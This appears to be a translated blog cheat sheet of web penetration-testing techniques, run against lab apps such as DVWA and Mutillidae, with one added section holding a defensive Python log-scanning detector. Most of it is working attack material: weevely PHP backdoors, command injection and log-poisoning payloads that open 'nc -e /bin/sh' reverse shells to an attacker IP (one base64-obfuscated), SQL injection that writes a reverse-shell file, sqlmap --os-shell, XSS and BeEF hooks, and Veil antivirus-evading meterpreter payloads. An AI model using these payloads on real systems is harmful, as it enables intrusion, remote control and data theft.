Common Penetration Testing Techniques

1. Information gathering
IP address
domain name info
technologies used
other websites on the same server
dns records
unlisted files, sub-domains, directories

Main tasks: whois lookup for detailed site information, subdomain scanning, directory scanning to look for sensitive information

Most of these services are foreign sites; if they cannot be reached, try going through a proxy.

?url=
https://www.robtex.com

2. File upload
The basis for connecting to a backdoor: you must know the address where the uploaded file is stored.
weevely generate [password] [file name] --------- generates a PHP backdoor file
weevely [url to file] [password] --------- connects to the backdoor file
Three cases:
1) Upload the backdoor code directly
2) Bypass the file-format check: intercept the request with Burp Suite and change the file extension, filename.php -> filename.jpg, filename.jpg -> filename.php
3) Likewise intercept the request: filename.jpg -> filename.php.jpg

3. Code execution
Where a web form passes its input to a system command, on Linux the ; or | characters can be used to chain an extra command and turn the code execution into privilege escalation
eg:
20.20.10.223;nc -e /bin/sh nc_server_ip port
20.20.10.223|nc -e /bin/sh nc_server_ip port

Privilege-escalation side
nc -vv -l -p 8080 ----- used to listen on the port

4. Local and remote file inclusion
A link address with a file inclusion vulnerability: ?page=../../../../../etc/passwd

/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log

?page=../../../../../proc/self/environ
Intercept the request with Burp Suite and modify the User-Agent header: User-Agent: <?phpinfo();?>
User-Agent:<?passthru("nc -e /bin/sh 192.168.101.3 8888");?>

?page=../../../../../var/log/auth.log
ssh "<?passthru("nc -e /bin/sh 192.168.101.3 8888");?>"@192.168.101.3 (the target)
The attacking machine listens on the port: nc -vv -l -p 8888
ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjEwMS4zIDg4ODg='));?>"@192.168.101.3

Remote file inclusion
Requires allow_url_include=On in the target's php.ini.
Create a file containing the code <?passthru("nc -e /bin/sh 192.168.101.3 8888");?> and make it reachable remotely.
Then include the file remotely on the target machine as follows:
?page=http://ip/path-to-file
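Added example, written from the defender's side and not part of the original notes: a small detector that flags the log-poisoning and inclusion patterns from this section in Apache access-log and sshd auth-log lines: directory traversal in the page parameter (including URL-encoded form), reads of /proc/self/environ or log files, and PHP tags or passthru/base64_decode calls smuggled into the User-Agent or the SSH username. The sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not taken from the original notes): three Apache
# combined-log entries and one sshd auth.log entry modelled on the techniques
# described in this section. The base64 blob decodes to the harmless string "ABC".
SAMPLE_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=../../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?phpinfo();?>"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=..%2F..%2F..%2Fvar%2Flog%2Fauth.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    "Jan  1 10:00:03 web sshd[1234]: Invalid user <?passthru(base64_decode('QUJD'));?> from 10.0.0.9 port 51000",
]

# Traversal sequences in either slash style.
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
# Files read to confirm LFI or to poison: /proc/self/environ, /etc/passwd, log files.
SENSITIVE_FILE = re.compile(r"/(?:proc/self/environ|etc/passwd|var/log/)", re.IGNORECASE)
# PHP open tag or the functions used in the poisoning payloads above. A bare "<?" also
# appears in legitimate XML prologs, so treat this as high-signal rather than conclusive.
PHP_INJECTION = re.compile(r"<\?|passthru\s*\(|base64_decode\s*\(", re.IGNORECASE)


def analyse_line(line):
    """Return the finding tags for one log line; an empty list means nothing suspicious."""
    decoded = unquote(line)  # %2F-encoded traversal must be decoded before matching
    findings = []
    if TRAVERSAL.search(decoded):
        findings.append("path-traversal")
    if SENSITIVE_FILE.search(decoded):
        findings.append("sensitive-file")
    if PHP_INJECTION.search(decoded):
        findings.append("php-injection")
    return findings


def analyse(lines):
    """Scan many lines; return (index, findings) pairs for lines with at least one finding."""
    return [(i, f) for i, line in enumerate(lines) if (f := analyse_line(line))]


if __name__ == "__main__":
    for index, findings in analyse(SAMPLE_LINES):
        print(f"line {index}: {', '.join(findings)}")
```

Any line tagged php-injection in a log that a PHP include can reach is exactly the precondition for the poisoning described above, so such hits deserve immediate review.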


5. SQL injection
adminpass' and 1=1#
monkey' and 1=1#
monkey' or 1=1 #
index.php?page=user-info.php&username=admin' order by 1#&password=adminpass&user-info-php-submit-button=View+Account+Details

union select 1,2,3,4,5
union select 1,database(),user(),version(),5
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = "metasploit"
union select 1,column_name,null,null,5 from information_schema.columns where table_name = "accounts"
union select 1,cid,username,password,5 from accounts

union select table_name,2 from information_schema.tables where table_schema = 'dvwa'
union select column_name,2 from information_schema.columns where table_name = 'users'
medium: the single quote ' is filtered
union select table_name,2 from information_schema.tables where table_schema=0x64767761


1'+uNion/**/sEleCt/**/1,2/**/%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+0,1%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+0,1%23

SQL injection read/write file:
union select null,load_file("/etc/passwd"),null,null,null
union select null,'example example',null,null,null into outfile '/var/www/mutillidae/example.txt'
write: union select '<?passthru("nc -e /bin/sh 192.168.101.71 8080");?>',null into outfile '/tmp/reverse.php'
union select '<?passthru("nc -e /bin/sh 192.168.101.71 8080");?>',null into outfile '/var/www/dvwa/reverse.php'

Tool features:
sqlmap -u "...." --os-shell
sqlmap -u "...." --sql-shell
If the injection point is a GET parameter: sqlmap -u "<injection point URL>"
If the injection point is a POST parameter: sqlmap -u "<injection point URL>" --data="<POST parameters>"
If it is in a cookie, X-Forwarded-For, etc.: intercept the request with Burp Suite while visiting the page, replace the injection point with *, save the request to a file, then run sqlmap -r "<file path>"

6. XSS
Stored XSS, reflected XSS, DOM XSS
low:
Directly: <script>alert('xss')</script>
<a>xss link</a>
<IMG SRC=#>
<IMG SRC=# onerror="alert('xss')"></IMG>

medium: vary the case of the tag, e.g. <sCripT>alert('xss')</scrIpt>
<script>alert(String.fromCharCode(120,115,115,50))</script>
<script>alert(String.fromCharCode(&#120;&#115;&#115;&#115;))</script>

Using BeEF:
"parameter"=<script src="http://192.168.101.71:3000/hook.js"></script>

?name=admin#
?name=<script src="http://192.168.101.71:3000/hook.js"></script>#

Using the Veil tool: -------- generates backdoors that evade detection (tool installation not completed)
1)evasion
2)ordnance

use 1 ---------- a few important tools
go/meterpreter/rev_http.py
go/meterpreter/rev_https.py
go/meterpreter/rev_tcp.py

lua/shellcode_inject/flat.py

In the end, the backdoor generated with Veil was still detected when implanted.

7. CSRF
Changing the password: send a link carrying hidden code that is mounted on the user's cookie
Use a token to hide the data in the site the user visits; as soon as the user submits, the password is changed automatically

Content copyright notice: unless otherwise stated, all articles are original to this site.

Reprints must cite the source: https://www.heiqu.com/wpxjzp.html